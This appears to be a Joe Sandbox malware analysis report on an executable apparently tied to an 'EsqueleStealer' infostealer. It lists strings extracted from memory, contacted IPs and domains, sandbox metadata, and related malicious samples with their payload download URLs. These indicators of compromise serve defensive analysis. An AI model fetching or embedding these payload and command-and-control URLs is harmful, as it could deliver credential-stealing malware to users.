                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dom.spec.whatwg.org/#retargetdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://fetch.spec.whatwg.org/#concept-headedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://golang.org/pkg/bytes/#Buffer.Grow).dGhlYXB0Z3JvdXA=-free.exefalse
                                                                		high
                                                                https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.dGhlYXB0Z3JvdXA=-free.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compiledGhlYXB0Z3JvdXA=-free.exefalse
                                                                    		high
                                                                    https://www.catcert.net/verarreldGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357438412.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2358901034.000001638FCE4000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355062459.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354104881.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359924565.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://myserver.comdGhlYXB0Z3JvdXA=-free.exefalse
                                                                        		high
                                                                        https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2246660024.0000019908482000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://w3c.github.io/FileAPI/dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://golang.org/pkg/bytes/#Buffer).dGhlYXB0Z3JvdXA=-free.exefalse
                                                                            		high
                                                                            https://github.com/beatgammit/base64-js/issues/42dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://url.spec.whatwg.org/#idnadGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://dom.spec.whatwg.org/#concept-event-path-appenddGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://github.com/Microsoft/TypeScript/issues/2577)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                		high
                                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                  		high
                                                                                  https://github.com/golang/go/blob/master/LICENSEdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/CompiledGhlYXB0Z3JvdXA=-free.exefalse
                                                                                      		high
                                                                                      http://skeletonwatcher.rest/api/get/freeMdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356660926.0000019908702000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://github.com/WICG/import-maps#the-import-mapSetdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                        		high
                                                                                        http://man7.org/linux/man-pages/man2/shutdown.2.htmldGhlYXB0Z3JvdXA=-free.exefalse
                                                                                          		high
                                                                                          https://wicg.github.io/import-maps/dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://html4/loose.dtddGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/ctz/webpki-rootsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                              		high
                                                                                              https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2340032549.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247169138.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247371351.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356439385.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                		high
                                                                                                http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validatdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                    		high
                                                                                                    https://deno.land/std/examples/cat.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                      		high
                                                                                                      https://tools.ietf.org/html/rfc2046#section-5.1dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/github/fetch/blob/master/fetch.jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://contoso.com/Licensepowershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                              		high
                                                                                                              https://github.com/vadimg/js_bintrees.dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txtdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://deno.land/manual/linking_to_external_code/import_mapsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                    		high
                                                                                                                    https://dom.spec.whatwg.org/#event-pathdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://deno.land/std/examples/colors.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                      		high
                                                                                                                      http://.cssdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://some/file.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://github.com/clap-rs/clap/issuesdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dl.deno.land/canary-latest.txtdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://deno.land/std/dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                            		high
                                                                                                                            https://w3c.github.io/user-timing)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://golang.org/pkg/io/#pkg-constantsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dl.deno.land/canary/PdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://crbug.com/v8/8520dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://fetch.spec.whatwg.org/#concept-construct-readablestreamdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://deno.land/std/testing/asserts.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/denoland/deno/tree/master/test_plugindGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                                        		high
                                                                                                                                        https://fetch.spec.whatwg.org/#dom-headersdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                                          		high
                                                                                                                                          https://github.com/denoland/deno/issues/4591)dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://deno.land/manualdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                                              		high
                                                                                                                                              http://.jpgdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://deno.land/std/examples/welcome.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  188.114.97.3
                                                                                                                                                  		skeletonwatcher.restEuropean Union
                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                  185.199.110.133
                                                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                                                  		54113FASTLYUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1583221
                                                                                                                                                  Start date and time:2025-01-02 08:58:15 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 31s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:12
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal72.expl.evad.winEXE@16/18@2/2
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 81%
                                                                                                                                                  • Number of executed functions: 4
                                                                                                                                                  • Number of non-executed functions: 2
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target dGhlYXB0Z3JvdXA=-free.exe, PID 6004 because there are no executed function
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  02:59:23API Interceptor31x Sleep call for process: powershell.exe modified
                                                                                                                                                  02:59:36API Interceptor1x Sleep call for process: WMIC.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.rgenerousrs.store/o362/
                                                                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.beylikduzu616161.xyz/2nga/
                                                                                                                                                  Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                                                  ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • paste.ee/d/lxvbq
                                                                                                                                                  Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                                                  PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                  http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                  • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                  gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                  Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                  • gmtagency.online/api/check
                                                                                                                                                  185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  raw.githubusercontent.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.199.109.133
                                                                                                                                                  ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.111.133
                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                  • 185.199.109.133
                                                                                                                                                  Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.111.133
                                                                                                                                                  eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.199.110.133
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 185.199.108.133
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 185.199.108.133
                                                                                                                                                  Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.110.133
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 185.199.111.133
                                                                                                                                                  NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.111.133

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  CLOUDFLARENETUSCRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                  • 172.67.19.24
                                                                                                                                                  http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                  • 104.17.208.240
                                                                                                                                                  ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                  • 104.21.79.229
                                                                                                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                  • 162.159.128.233
                                                                                                                                                  7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                  • 104.21.32.1
                                                                                                                                                  UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.21.32.1
                                                                                                                                                  544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                  • 172.67.220.198
                                                                                                                                                  KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 172.67.157.254
                                                                                                                                                  FASTLYUShttps://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                  • 151.101.66.137
                                                                                                                                                  01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 151.101.66.137
                                                                                                                                                  Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 185.199.109.133
                                                                                                                                                  https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.193.44
                                                                                                                                                  http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.65.44
                                                                                                                                                  https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 151.101.129.44
                                                                                                                                                  ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 185.199.111.133
